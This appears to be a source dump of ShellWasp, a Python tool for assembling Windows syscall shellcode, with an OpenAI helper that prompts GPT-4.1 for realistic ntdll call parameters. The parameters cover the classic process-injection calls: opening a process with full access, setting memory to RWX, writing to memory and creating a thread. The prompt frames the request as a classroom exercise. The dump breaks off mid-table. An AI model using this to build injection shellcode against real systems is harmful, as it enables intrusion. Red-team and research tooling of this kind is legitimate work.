if(techIN[0:1] == "x"): # print("Returning to find shellcode instructions menu.\n") break elif(techIN[0:1] == "a"): uiAddSyscalls() # print("Returning to tech settings submenu.\n") elif(techIN[0:1] == "c"): sh.list_of_syscalls.clear() print ("\tSyscalls cleared.\n") # print("Returning to tech settings submenu.\n") elif(techIN[0:1] == "s"): uiShowSyscalls() # print("Returning to tech settings submenu.\n") elif(techIN[0:1] == "e"): uiEditSyscalls() elif(techIN[0:1] == "r"): uiRearrangeSyscalls() elif(techIN[0:1] == "h"): uiShowOptionsSyscallSelections() else: print("Invalid input") def generateBytes(shellInput): ks = Ks(KS_ARCH_X86, KS_MODE_32) ks.syntax= KS_OPT_SYNTAX_NASM sRaw.shellcode, sRaw.count = ks.asm(shellInput) sRaw.bytesShellcode=bytes(sRaw.shellcode) sRaw.bytesShellcode=cya+sRaw.bytesShellcode.hex()+res sRaw.shellCodeStrLit = 'x' + str(hexlify(bytearray(sRaw.shellcode),'x',1))[2:-1] sRaw.shellCodeStrLit = '"' + sRaw.shellCodeStrLit.replace('x','\\x') + '"' sRaw.shellCodeStrLit = blu+ sRaw.shellCodeStrLit+res def ui(): splash() showOptions() uiShowOptionsMainMenu() global sampleVals,integrateAI x = "" while x != "e": #Loops on keyboard input try: #Will break the loop on entering x print(yel + " ShellWasp> " + res, end="") userIN = input() print(res) if userIN[0:1] == "x": print("\nExiting program.\n") break elif userIN[0:1] == "i": giveInput() elif userIN[0:1] == "s": uiSyscallStyle() elif userIN[0:1] == "b": integrateAI=False sampleVals=False out=buildSyscall() print(out) elif userIN[0:1] == "B": sampleVals=True integrateAI=False out=buildSyscall() print(out) elif userIN[0:1] == "A": if OPENAI_API_KEY=="putYourKeyHere": print (red," You must obtain and enter your"+whi+" OPENAI_API_KEY"+red+" and place it in "+whi+"myKeys.py"+red+".",res) break integrateAI=True sampleVals=False out=buildSyscall() print(out) elif userIN[0:1] == "p": buildSyscall(True) elif userIN[0:1] == "w": giveInputWinReleases() elif(re.match("^b$", userIN)): pass elif userIN[0:1] == "U" or userIN[0:1] == "u": pass elif userIN[0:1] == "a": # "change architecture, 32-bit or 64-bit" # print("\nReturning to main menu.\n") pass elif(re.match("^c$", userIN)): # "save configuration" con = Configuration(conFile) # print("trying to save!") modConf() saveConf(con) elif userIN[0:1] == "h": uiShowOptionsMainMenu() else: print("\nInvalid input.\n") except Exception as e: print (e) print(traceback.format_exc()) print ("exception") def syscallMain(): readConf() # out=buildSyscall(True) # print(out) ui() sConf=configOpt() sh = shellcode() builds=winReleases() syscalls=winSyscalls() sRaw=shellBytes() ================================================ FILE: start/singleton/__init__.py ================================================ from .helpers import Singleton __all__ = ["Singleton"] ================================================ FILE: start/singleton/helpers.py ================================================ from abc import ABCMeta from typing import Any class Singleton(ABCMeta): """ This class is a standard implementation of the Single Pattern (Note: Has not been tested for Thread Saftey) """ _instances = {} def __call__(cls, *args, **kwargs) -> Any: if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) return cls._instances[cls] ================================================ FILE: start/syscallAIHelper.py ================================================ from pathlib import Path from datetime import datetime from contextlib import redirect_stdout import io import os import json import time import copy from openai import OpenAI from openai import BadRequestError, APIConnectionError, APITimeoutError, RateLimitError, InternalServerError from .myKeys import OPENAI_API_KEY from .syscallAiPrompts import PROMPT_PREFIX, schema SAVE_STEM = "calls" CURRENT_JSON_NAME = f"{SAVE_STEM}_current.json" RESUME_CURRENT = False AUTO_SAVE_CURRENT = True SHOW_STRUCTURE_FIELDS_IN_TEXT = True MODEL = "gpt-4.1" DEBUG_OUTPUT = False JSON_SUBDIR_NAME = "json" MODEL_PRICING = { "gpt-4.1": { "input_per_million": 2.0, "output_per_million": 8.0 }, "gpt-4o": { "input_per_million": 2.5, "output_per_million": 10.0 } } runStats = { "numCalls": 0, "promptTokens": 0, "completionTokens": 0, "totalTokens": 0, "estimatedCost": 0.0 } def dprint(*args, **kwargs): if DEBUG_OUTPUT: print(*args, **kwargs) def resetRunStats(): runStats["numCalls"] = 0 runStats["promptTokens"] = 0 runStats["completionTokens"] = 0 runStats["totalTokens"] = 0 runStats["estimatedCost"] = 0.0 def estimateCostFromCounts(modelName: str, promptTokens: int, completionTokens: int) -> float: pricing = MODEL_PRICING[modelName] inputCost = (promptTokens / 1_000_000) * pricing["input_per_million"] outputCost = (completionTokens / 1_000_000) * pricing["output_per_million"] return inputCost + outputCost def addUsageToRunStats(modelName: str, usageObj) -> float: callCost = estimateCostFromCounts( modelName, usageObj.prompt_tokens, usageObj.completion_tokens ) runStats["numCalls"] += 1 runStats["promptTokens"] += usageObj.prompt_tokens runStats["completionTokens"] += usageObj.completion_tokens runStats["totalTokens"] += usageObj.total_tokens runStats["estimatedCost"] += callCost return callCost def printRunStats(): dprint("\n--- Running Totals ---") dprint("OpenAI calls:", runStats["numCalls"]) dprint("Prompt tokens:", runStats["promptTokens"]) dprint("Completion tokens:", runStats["completionTokens"]) dprint("Total tokens:", runStats["totalTokens"]) dprint(f"Estimated total cost: ${runStats['estimatedCost']:.6f}") def makeEmptyAggregate(): return { "calls": [], "structures": {} } def getWorkingDir(): return Path.cwd() def getJsonDir(baseDir=None): if baseDir is None: baseDir = getWorkingDir() baseDir = Path(baseDir) jsonDir = baseDir / JSON_SUBDIR_NAME jsonDir.mkdir(parents=True, exist_ok=True) return jsonDir def getTimestamp(): return datetime.now().strftime("%Y%m%d_%H%M%S") def sanitizeFilenamePiece(text: str) -> str: if not text: return "noCalls" safeChars = [] for ch in str(text): if ch.isalnum() or ch in ("-", "_"): safeChars.append(ch) else: safeChars.append("_") cleaned = "".join(safeChars).strip("_") return cleaned or "noCalls" def getFirstFuncName(result: dict) -> str: calls = result.get("calls", []) if not calls: return "noCalls" firstName = calls[0].get("ntFunc", "noCalls") return sanitizeFilenamePiece(firstName) def writeTextAtomic(path: Path, text: str): tempPath = path.with_suffix(path.suffix + ".tmp") tempPath.write_text(text, encoding="utf-8") tempPath.replace(path) def saveJsonFile(path: Path, data: dict): jsonText = json.dumps(data, indent=2) writeTextAtomic(path, jsonText) def loadJsonFile(path: Path): if not path.exists(): return None raw = path.read_text(encoding="utf-8") if not raw or not raw.strip(): dprint(f"Warning: JSON file is empty: {path}") return None try: return json.loads(raw) except json.JSONDecodeError as e: dprint(f"Warning: invalid JSON in {path}: {e}") return None def convertChunkStructuresToDict(result: dict) -> dict: if not isinstance(result, dict): return { "calls": [], "structures": {} } calls = result.get("calls", []) if not isinstance(calls, list): calls = [] structures = result.get("structures", {}) structuresDict = {} # Canonical format: dict already if isinstance(structures, dict): for structId, structDef in structures.items(): if isinstance(structDef, dict): structuresDict[structId] = { "type": structDef.get("type", ""), "fields": structDef.get("fields", []) } # Legacy compatibility only: list with embedded "id" elif isinstance(structures, list): for structEntry in structures: if not isinstance(structEntry, dict): continue structId = structEntry.get("id") if not structId: continue structuresDict[structId] = { "type": structEntry.get("type", ""), "fields": structEntry.get("fields", []) } return { "calls": calls, "structures": structuresDict } def normalizeAggregate(data): if not isinstance(data, dict): return makeEmptyAggregate() if "calls" not in data or not isinstance(data["calls"], list): data["calls"] = [] if "structures" not in data or not isinstance(data["structures"], dict): data["structures"] = {} return data def loadCurrentAggregate(jsonDir: Path): currentPath = jsonDir / CURRENT_JSON_NAME loaded = loadJsonFile(currentPath) if loaded is None: return makeEmptyAggregate() return normalizeAggregate(loaded) def saveCurrentAggregate(aggregate: dict, jsonDir: Path): currentPath = jsonDir / CURRENT_JSON_NAME saveJsonFile(currentPath, aggregate) return currentPath def renderCallsNicerText(result, showStructureFields=True): buffer = io.StringIO() with redirect_stdout(buffer): formatCallsNicer(result, showStructureFields=showStructureFields) return buffer.getvalue() def getNextStructNum(structureDict: dict) -> int: maxNum = 0 for structId in structureDict.keys(): if not isinstance(structId, str): continue if not structId.startswith("struct"): continue suffix = structId[len("struct"):] if suffix.isdigit(): maxNum = max(maxNum, int(suffix)) return maxNum + 1 def saveResultsBundle(result, baseDir=None, saveStem=SAVE_STEM, showStructureFields=True): """ Manual save function. Saves: - dated JSON snapshot into ./json - current working JSON into ./json - dated text rendering using formatCallsNicer() into ./json """ if baseDir is None: baseDir = getWorkingDir() jsonDir = getJsonDir(baseDir) timestamp = getTimestamp() firstFunc = getFirstFuncName(result) datedJsonPath = jsonDir / f"{saveStem}_{firstFunc}_{timestamp}.json" currentJsonPath = jsonDir / CURRENT_JSON_NAME datedTextPath = jsonDir / f"{saveStem}_{firstFunc}_{timestamp}.txt" saveJsonFile(datedJsonPath, result) saveJsonFile(currentJsonPath, result) prettyText = renderCallsNicerText( result, showStructureFields=showStructureFields ) writeTextAtomic(datedTextPath, prettyText) dprint("\n--- Saved Files ---") dprint("Dated JSON:", datedJsonPath) dprint("Current JSON:", currentJsonPath) dprint("Dated text:", datedTextPath) return { "datedJson": datedJsonPath, "currentJson": currentJsonPath, "datedText": datedTextPath } def mergeChunkResult(aggregate: dict, chunkResult: dict, chunkIndex: int) -> dict: """ Merge one chunk result into the aggregate JSON. Behavior: - preserves call order by appending - stores structures in a top-level dictionary keyed by struct ID - remaps structure IDs so there are no collisions across chunks - updates each push's structureRef accordingly - does NOT deduplicate anything """ aggregate = normalizeAggregate(aggregate) chunkResult = normalizeAggregate(copy.deepcopy(chunkResult)) structureIdMap = {} nextStructNum = getNextStructNum(aggregate["structures"]) for oldId, structEntry in chunkResult["structures"].items(): newId = f"struct{nextStructNum}" nextStructNum += 1 structureIdMap[oldId] = newId aggregate["structures"][newId] = copy.deepcopy(structEntry) for callEntry in chunkResult["calls"]: newCallEntry = copy.deepcopy(callEntry) for pushEntry in newCallEntry.get("pushes", []): oldRef = pushEntry.get("structureRef") if oldRef: pushEntry["structureRef"] = structureIdMap.get(oldRef, oldRef) aggregate["calls"].append(newCallEntry) return aggregate def formatField(field, nameWidth=24, typeWidth=20): fieldName = field.get("fieldName", "") fieldType = field.get("fieldType", "") fieldValue = field.get("fieldValue", "") fieldComment = field.get("fieldComment") or "" line = f"\t\t{fieldName:<{nameWidth}} {fieldType:<{typeWidth}} = {fieldValue}" if fieldComment: line += f" ; {fieldComment}" return line def formatStructure(structId, structDef): if not structDef: return structType = structDef.get("type", "") fields = structDef.get("fields", []) print(f"\tstructure definition: {structType} ({structId})") if not fields: print("\t\t") return for field in fields: print(formatField(field)) def formatPushEntry(entry, structureMap=None, commentColumn=24, showStructureFields=True): value = entry.get("value", "") comment = entry.get("additionalComment") or "" structurePointer = entry.get("structurePointer") structureRef = entry.get("structureRef") structureValueExpectations = entry.get("structureValueExpectations") pointedValue = entry.get("pointedValue") line = f"push {value}" if comment: padding = max(1, commentColumn - len(value)) line += (" " * padding) + f"; {comment}" print(line) if pointedValue: print(f"\tpointed value: {pointedValue}") if structurePointer: if structureRef: print(f"\tstructure: {structurePointer} ({structureRef})") else: print(f"\tstructure: {structurePointer}") if structureValueExpectations: print(f"\texpected fields: {structureValueExpectations}") if structureRef and structureMap: structDef = structureMap.get(structureRef) if structDef and showStructureFields: formatStructure(structureRef, structDef) elif showStructureFields: print(f"\tstructure definition: ") print() def formatPushes(pushes, structureMap=None, commentColumn=24, showStructureFields=True): for entry in pushes: formatPushEntry( entry, structureMap=structureMap, commentColumn=commentColumn, showStructureFields=showStructureFields ) def formatPushesNicer(pushes, structureMap=None, showStructureFields=True): formatPushes( pushes, structureMap=structureMap, commentColumn=24, showStructureFields=showStructureFields ) def formatCalls(result, showStructureFields=True): calls = result.get("calls", []) structureMap = result.get("structures", {}) for idx, call in enumerate(calls, start=1): ntFunc = call.get("ntFunc", "") pushes = call.get("pushes", []) print(f"=== Call {idx}: {ntFunc} ===") formatPushes( pushes, structureMap=structureMap, commentColumn=24, showStructureFields=showStructureFields ) def formatCallsNicer(result, showStructureFields=True): formatCalls(result, showStructureFields=showStructureFields) def runPrompt(myPrompt: str): client = OpenAI(api_key=OPENAI_API_KEY) response = client.chat.completions.create( model=MODEL, messages=[{"role": "user", "content": myPrompt}], response_format={ "type": "json_schema", "json_schema": schema }, temperature=0 ) raw = response.choices[0].message.content usage = response.usage callCost = addUsageToRunStats(MODEL, usage) dprint("\n--- Token Usage For This Call ---") dprint("Prompt tokens:", usage.prompt_tokens) dprint("Completion tokens:", usage.completion_tokens) dprint("Total tokens:", usage.total_tokens) dprint(f"Estimated cost for this call: ${callCost:.6f}") parsed = json.loads(raw) # json.loads() already converts JSON null -> Python None in memory. # This additionally converts structures from list form into dict form in memory. parsed = convertChunkStructuresToDict(parsed) return parsed def runPromptWithRetry(myPrompt: str, maxRetries=5, baseDelay=3): attempt = 0 while True: try: return runPrompt(myPrompt) except KeyboardInterrupt: raise except BadRequestError: raise except (APIConnectionError, APITimeoutError, RateLimitError, InternalServerError) as e: attempt += 1 if attempt > maxRetries: dprint(f"Giving up after {maxRetries} retries: {e}") raise delay = baseDelay * (2 ** (attempt - 1)) dprint(f"Retryable OpenAI error on attempt {attempt}/{maxRetries}: {e}") dprint(f"Sleeping {delay} seconds before retry...") time.sleep(delay) except Exception as e: attempt += 1 if attempt > maxRetries: dprint(f"Giving up after {maxRetries} retries: {e}") raise delay = baseDelay * (2 ** (attempt - 1)) dprint(f"Unexpected error on attempt {attempt}/{maxRetries}: {e}") dprint(f"Sleeping {delay} seconds before retry...") time.sleep(delay) def chunkList(items, chunkSize): for i in range(0, len(items), chunkSize): yield items[i:i + chunkSize] def buildChunkPrompt(promptPrefix: str, apiChunk: list[str]) -> str: return promptPrefix.rstrip() + "\n\n" + "\n\n".join(apiChunk) def processApiBlocksInChunks( apiBlocks: list[str], chunkSize: int, promptPrefix: str = PROMPT_PREFIX, resumeCurrent: bool = RESUME_CURRENT, autoSaveCurrent: bool = AUTO_SAVE_CURRENT, baseDir=None, debugOutput: bool = DEBUG_OUTPUT ): global DEBUG_OUTPUT DEBUG_OUTPUT = debugOutput if baseDir is None: baseDir = getWorkingDir() baseDir = Path(baseDir) baseDir.mkdir(parents=True, exist_ok=True) jsonDir = getJsonDir(baseDir) if resumeCurrent: aggregate = loadCurrentAggregate(jsonDir) dprint(f"\n--- Resuming from existing current JSON: {jsonDir / CURRENT_JSON_NAME} ---\n") else: aggregate = makeEmptyAggregate() dprint(f"\n--- Starting fresh; current JSON will be overwritten: {jsonDir / CURRENT_JSON_NAME} ---\n") if autoSaveCurrent: saveCurrentAggregate(aggregate, jsonDir) for chunkIndex, apiChunk in enumerate(chunkList(apiBlocks, chunkSize), start=1): chunkPrompt = buildChunkPrompt(promptPrefix, apiChunk) dprint(f"\n=== Processing chunk {chunkIndex} with {len(apiChunk)} API block(s) ===\n") chunkResult = runPromptWithRetry(chunkPrompt) aggregate = mergeChunkResult( aggregate=aggregate, chunkResult=chunkResult, chunkIndex=chunkIndex ) if autoSaveCurrent: currentPath = saveCurrentAggregate(aggregate, jsonDir) dprint(f"Updated current JSON: {currentPath}") return aggregate def buildPossibleValues( apiBlocks: list[str], chunkSize: int = 1, resumeCurrent: bool = RESUME_CURRENT, autoSaveCurrent: bool = AUTO_SAVE_CURRENT, baseDir=None, debugOutput: bool = DEBUG_OUTPUT ): resetRunStats() result = processApiBlocksInChunks( apiBlocks=apiBlocks, chunkSize=chunkSize, promptPrefix=PROMPT_PREFIX, resumeCurrent=resumeCurrent, autoSaveCurrent=autoSaveCurrent, baseDir=baseDir, debugOutput=debugOutput ) return result # if __name__ == "__main__": # # from printApiBlocks import api_blocks # # result = buildPossibleValues( # # apiBlocks=api_blocks, # # chunkSize=1, # # resumeCurrent=False, # # autoSaveCurrent=True, # # baseDir=Path.cwd(), # # debugOutput=True # # ) # dprint("\n--- Pretty JSON (entire result) ---\n") # dprint(json.dumps(result, indent=2)) # dprint("\n--- Pretty JSON (calls only) ---\n") # dprint(json.dumps(result["calls"], indent=2)) # dprint("\n--- Assembly Style ---\n") # if DEBUG_OUTPUT: # formatCalls(result) # dprint("\n--- Assembly Style 2 ---\n") # if DEBUG_OUTPUT: # formatCallsNicer(result) # printRunStats() # saveResultsBundle( # result, # baseDir=Path.cwd(), # saveStem=SAVE_STEM, # showStructureFields=SHOW_STRUCTURE_FIELDS_IN_TEXT # ) ================================================ FILE: start/syscallAiPrompts.py ================================================ PROMPT_PREFIX = """ Return structured JSON with highly realistic sample values. You are given Windows assembly push instructions where every pushed operand is an immediate literal. Return a JSON object with exactly these top-level fields: - calls - An array of function-call entries. - Each entry represents one ntdll-export call and its pushed parameters. - structures - A top-level array of expanded structure definitions. - Each structure definition must include an "id" such as "struct1", "struct2", or "struct3". - Those "id" values are referenced by structureRef inside pushes. - Note: after parsing, my tool will convert this list into my canonical dict form: { "struct1": { ... } }. Each object in calls must contain exactly these fields: - ntFunc - The name of the ntdll-export function associated with this group of pushes. - Examples: - "NtProtectVirtualMemory" - "NtCreateSection" - "NtOpenProcess" - pushes - The pushed parameters for that function call. - Preserve the exact push order as written in the input assembly. Each object in pushes must contain exactly these fields: - value - The pushed immediate, formatted as a hexadecimal string. - Use the raw value, not a symbolic constant name. - Example: "0x00000040" - For pointer-like placeholders, use an obvious dummy hexadecimal value and note that it is a dummy value. - For handle-like placeholders, use an obvious dummy hexadecimal value and note that it is a dummy value. - If a default value is appropriate, it may be used. - additionalComment - A human-readable comment that could be appended to the original assembly comment with relevant details. - Include a symbolic constant name if applicable, but do not replace the raw hexadecimal value. - Examples: "NULL", "MEM_COMMIT", "Pointer to OBJECT_ATTRIBUTES" - If a value is a default or dummy value, say so here. - structurePointer - If the value is a pointer to a structure, return the structure type name; otherwise return null. - Examples: "OBJECT_ATTRIBUTES", "CLIENT_ID", "LARGE_INTEGER" - structureRef - If the pushed value is a pointer to a structure, return the id of the matching structure definition in the top-level structures array” - Otherwise return null. - Examples: - "struct1" - "struct2" - structureValueExpectations - Short text describing the kinds of values expected inside that structure for this parameter, otherwise null. - pointedValue - If the pushed immediate represents a pointer to a non-structure value, provide the value stored at that pointed-to location. - Format it as a hexadecimal string when appropriate. - Examples: - "0x00001000" for a pointed-to ULONG - "0x10000000" for a pointed-to base address - If the pushed value is a pointer to a structure, return null. - If the pushed value is not being used as a pointer, return null. Each object in structures must contain exactly these fields: - id - type - The structure type name. - Examples: - "OBJECT_ATTRIBUTES" - "CLIENT_ID" - "LARGE_INTEGER" - "UNICODE_STRING" - fields - An array of field definitions for the structure. Each object in fields must contain exactly these fields: - fieldName - The field name within the structure. - fieldType - The type of the field. - fieldValue - A sample value for the field. - Format it as a hexadecimal string when appropriate. - fieldComment - A short human-readable explanation of the field value. Rules - Preserve push order exactly as written. - value must always be a hexadecimal string. - Do not output decimal values. - Do not replace value with symbolic names. - Use additionalComment for human-readable meaning. - Use structurePointer only when the immediate value is being used as a pointer to a structure type. - Use structureValueExpectations only when structurePointer is not null. - Use pointedValue only for pointers to non-structure values. - If structurePointer is not null, pointedValue must be null. - Do not duplicate full structure field definitions inside pushes. - Put expanded structure definitions only in the top-level structures array and reference them by structureRef. - Output JSON only. - For ANY pointer address, push or struc, please use some variant of 0xbadd0000, e.g. 0xbadd0010, etc. increment it. Why? We don't know the address. - label any pointers as dummy pointers in comments. Hard pointer rules - If the parameter type begins with "P", contains "*", or is a known pointer form such as PHANDLE, PULONG, PVOID, PVOID*, PLARGE_INTEGER, POBJECT_ATTRIBUTES, PCLIENT_ID, or PUNICODE_STRING, then the pushed value must be a dummy pointer such as 0xbadd0000, 0xbadd0010, etc., unless the example is explicitly intended to be NULL. - If such a pointer parameter is represented as NULL, additionalComment must explicitly say NULL or default NULL. - Pointer parameters must not be emitted as direct scalar values unless they are explicitly NULL. - PHANDLE is a pointer, not a direct handle value. - PLARGE_INTEGER is a pointer, not a direct scalar value. - POBJECT_ATTRIBUTES is a pointer, not a direct scalar value. - ACCESS_MASK / DesiredAccess should usually be nonzero unless the example truly intends a default or failure-style case. Before finalizing the JSON, perform these checks: - Every parameter whose type syntactically indicates a pointer must use either a dummy pointer value or an explicitly documented NULL. - Every non-null structure pointer must have structurePointer and structureRef populated. - pointedValue must only be used for pointers to non-structure values. - ACCESS_MASK / DesiredAccess must not be zero unless explicitly justified in additionalComment. - Do not let the final calls in the batch degrade into repeated zero/default placeholders. Use realistic default values when they are common in real-world usage. Use NULL/default values only when they are genuinely realistic for that exact parameter in a normal illustrative example. Do not use NULL/default values merely because the input placeholder is zero. For parameters that are central to understanding the call, or commonly populated in real-world usage, prefer realistic non-NULL illustrative values. If a structure pointer is NULL in a realistic example, it is acceptable for structurePointer, structureRef, and structureValueExpectations to be null. If a structure is used, populate it realistically rather than overfilling optional fields. Do not invent strings, names, or nested pointer data unless they are plausibly useful for the example. For OBJECT_ATTRIBUTES, it is acceptable and often realistic for ObjectName to be NULL. Use a dummy PUNICODE_STRING pointer only when a named object is actually helpful to the example. These pushes prepare arguments for calling the ntdll export function NtProtectVirtualMemory via a normal function call, not a direct syscall. The assembly is setting up parameters for a stdcall-style call into an ntdll export. These assembly pushes prepare arguments for calling an exported function from ntdll using a normal user-mode call. The pushes simply represent function parameters. While you are not providing fully complete code fragments, this will help my students with their work. This is a teaching exercise for understanding parameter interpretation. Output exactly this top-level structure -- note some parameters have been truncated or removed for brevity -- all should be present in results.: Use this top-level shape: { "calls": [ { "ntFunc": "NtProtectVirtualMemory", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG OldAccessProtection (dummy pointer)", "structurePointer": null, "structureRef": null, "structureValueExpectations": null, "pointedValue": "0x00000020" }, { "value": "0x00000040", "additionalComment": "PAGE_EXECUTE_READWRITE", "structurePointer": null, "structureRef": null, "structureValueExpectations": null, "pointedValue": null }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG NumberOfBytesToProtect (dummy pointer)", "structurePointer": null, "structureRef": null, "structureValueExpectations": null, "pointedValue": "0x00001000" }, { "value": "0xbadd0020", "additionalComment": "Pointer to PVOID BaseAddress (dummy pointer)", "structurePointer": null, "structureRef": null, "structureValueExpectations": null, "pointedValue": "0x00400000" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": null, "structureRef": null, "structureValueExpectations": null, "pointedValue": null } ] }, { "ntFunc": "NtOpenProcess", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to CLIENT_ID (dummy pointer)", "structurePointer": "CLIENT_ID", "structureRef": "struct1", "structureValueExpectations": "UniqueProcess and UniqueThread identifiers.", "pointedValue": null }, { "value": "0xbadd0040", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct2", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": null }, { "value": "0x001F0FFF", "additionalComment": "DesiredAccess (PROCESS_ALL_ACCESS)", "structurePointer": null, "structureRef": null, "structureValueExpectations": null, "pointedValue": null }, { "value": "0xbadd0050", "additionalComment": "Pointer to HANDLE ProcessHandle (dummy pointer)", "structurePointer": null, "structureRef": null, "structureValueExpectations": null, "pointedValue": "0x00000000" } ] } ], "structures": [ { "id": "struct1", "type": "CLIENT_ID", "fields": [ { "fieldName": "UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99994444", "fieldComment": "Dummy process identifier value" }, { "fieldName": "UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "NULL or unused example value" } ] }, { "id": "struct2", "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "NULL" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "NULL (often omitted in realistic examples)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "NULL" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "NULL" } ] } ] } Important! The input immediates are placeholders only. Do not copy placeholder zero values across all entries. Use real-world, nonzero illustrative hexadecimal sample values where appropriate. Again, you MUST provide realistic, reasonable, real-world examples for our students! """ old=""" this is for an ntdll user mode call [ntdll!NtProtectVirtualMemory] with RWX push 0x00000000 ; PULONG OldAccessProtection push 0x00000000 ; ULONG NewAccessProtection push 0x00000000 ; PULONG NumberOfBytesToProtect push 0x00000000 ; PVOID *BaseAddress push 0x00000000 ; HANDLE ProcessHandle this is for an ntdll user mode call [ntdll!NtCreateSection] push 0x00000000 ; HANDLE FileHandle push 0x00000000 ; ULONG AllocationAttributes push 0x00000000 ; ULONG SectionPageProtection push 0x00000000 ; PLARGE_INTEGER MaximumSize push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes push 0x00000000 ; ACCESS_MASK DesiredAccess push 0x00000000 ; PHANDLE SectionHandle """ schema = { "name": "nt_call_list", "strict": True, "schema": { "type": "object", "properties": { "calls": { "type": "array", "items": { "type": "object", "properties": { "ntFunc": {"type": "string"}, "pushes": { "type": "array", "items": { "type": "object", "properties": { "value": {"type": "string"}, "additionalComment": { "anyOf": [{"type": "string"}, {"type": "null"}] }, "structurePointer": { "anyOf": [{"type": "string"}, {"type": "null"}] }, "structureRef": { "anyOf": [{"type": "string"}, {"type": "null"}] }, "structureValueExpectations": { "anyOf": [{"type": "string"}, {"type": "null"}] }, "pointedValue": { "anyOf": [{"type": "string"}, {"type": "null"}] } }, "required": [ "value", "additionalComment", "structurePointer", "structureRef", "structureValueExpectations", "pointedValue" ], "additionalProperties": False } } }, "required": ["ntFunc", "pushes"], "additionalProperties": False } }, "structures": { "type": "array", "items": { "type": "object", "properties": { "id": {"type": "string"}, "type": {"type": "string"}, "fields": { "type": "array", "items": { "type": "object", "properties": { "fieldName": {"type": "string"}, "fieldType": {"type": "string"}, "fieldValue": {"type": "string"}, "fieldComment": { "anyOf": [{"type": "string"}, {"type": "null"}] } }, "required": [ "fieldName", "fieldType", "fieldValue", "fieldComment" ], "additionalProperties": False } } }, "required": ["id", "type", "fields"], "additionalProperties": False } } }, "required": ["calls", "structures"], "additionalProperties": False } } api_blocks = [ """this is for an ntdll user mode call [ntdll!NtProtectVirtualMemory] with RWX push 0x00000000 ; PULONG OldAccessProtection push 0x00000000 ; ULONG NewAccessProtection push 0x00000000 ; PULONG NumberOfBytesToProtect push 0x00000000 ; PVOID *BaseAddress push 0x00000000 ; HANDLE ProcessHandle this is for an ntdll user mode call [ntdll!NtWaitForSingleObject] push 0x00000000 ; PLARGE_INTEGER TimeOut push 0x00000000 ; BOOLEAN Alertable push 0x00000000 ; HANDLE ObjectHandle this is for an ntdll user mode call [ntdll!NtCreateThreadEx] push 0x00000000 ; PVOID AttributeList push 0x00000000 ; ULONG MaximumStackSize push 0x00000000 ; ULONG StackSize push 0x00000000 ; ULONG ZeroBits push 0x00000000 ; ULONG CreateFlags push 0x00000000 ; PVOID Argument push 0x00000000 ; PVOID StartR__OUTine push 0x00000000 ; HANDLE ProcessHandle push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes push 0x00000000 ; ACCESS_MASK DesiredAccess push 0x00000000 ; PHANDLE ThreadHandle this is for an ntdll user mode call [ntdll!NtCreateSection] push 0x00000000 ; HANDLE FileHandle push 0x00000000 ; ULONG AllocationAttributes push 0x00000000 ; ULONG SectionPageProtection push 0x00000000 ; PLARGE_INTEGER MaximumSize push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes push 0x00000000 ; ACCESS_MASK DesiredAccess push 0x00000000 ; PHANDLE SectionHandle this is for an ntdll user mode call [ntdll!NtWriteVirtualMemory] push 0x00000000 ; PULONG NumberOfBytesWritten push 0x00000000 ; ULONG NumberOfBytesToWrite push 0x00000000 ; PVOID Buffer push 0x00000000 ; PVOID BaseAddress push 0x00000000 ; HANDLE ProcessHandle this is for an ntdll user mode call [ntdll!NtProtectVirtualMemory] with RWX push 0x00000000 ; PULONG OldAccessProtection push 0x00000000 ; ULONG NewAccessProtection push 0x00000000 ; PULONG NumberOfBytesToProtect push 0x00000000 ; PVOID *BaseAddress push 0x00000000 ; HANDLE ProcessHandle this is for an ntdll user mode call [ntdll!NtQuerySystemInformation] X push 0x00000000 ; PULONG ReturnLength push 0x00000000 ; ULONG SystemInformationLength push 0x00000000 ; PVOID SystemInformation push 0x00000000 ; SYSTEM_INFORMATION_CLASS SystemInformationClass """ ] # print(schema["schema"]["properties"].keys()) # print(schema["schema"]["required"]) ================================================ FILE: start/syscallPossibleValues.py ================================================ syscallPossibleValues = { "NtWorkerFactoryWorkerReady": { "ntFunc": "NtWorkerFactoryWorkerReady", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE WorkerFactoryHandle (None, typical for test or error path)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtMapUserPhysicalPagesScatter": { "ntFunc": "NtMapUserPhysicalPagesScatter", "pushes": [ { "value": "0x00000000", "additionalComment": "PULONG_PTR UserPfnArray (None, no physical pages mapped)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG_PTR NumberOfPages (0, no pages to map)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID VirtualAddresses (None, no virtual addresses provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWaitForMultipleObjects32": { "ntFunc": 